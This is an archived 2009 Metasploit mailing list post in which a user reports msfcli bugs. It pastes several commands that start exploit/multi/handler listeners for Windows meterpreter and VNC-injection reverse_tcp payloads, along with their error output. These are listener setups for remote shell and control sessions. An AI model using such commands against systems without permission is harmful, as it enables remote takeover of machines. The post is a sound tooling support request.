Metasploit mailing list archives

msfcli


From: krasn at ans.gr (Nicolas Krassas)
Date: Fri, 27 Mar 2009 13:02:42 +0200

Greetings,
    I've encountered a strange problem on msfcli, i'm pasting the lines 
below,

root at fr:~/trunk# ./msfcli exploit/multi/handler 
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx E
[*] Please wait while we load the module tree...
./msfcli:150: undefined method `datastore' for nil:NilClass (NoMethodError)


root at fr:~/trunk# ./msfcli exploit/multi/handler 
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[-] Exploit failed:

Here above i just pressed ctrl c to interrupt the cli

root at fr:~/trunk# ./msfcli exploit/multi/handler 
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx LPORT 4444 
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
./lib/msf/core/data_store.rb:93:in `each': The argument could not be parsed 
correctly. (Rex::ArgumentParseError)
        from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
        from ./msfcli:140

Again error when i'm using the correct ip address of the host,

 ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp  E
[*] Please wait while we load the module tree...
[-] Exploit failed: The following options failed to validate: LHOST.

And finally

root at fr:~/trunk# ./msfcli exploit/multi/handler 
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=91.xxx.xx.xxx  E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


The commands where used one after the other, no change was done on the 
system in between.

Regards,
Dinos 



Current thread: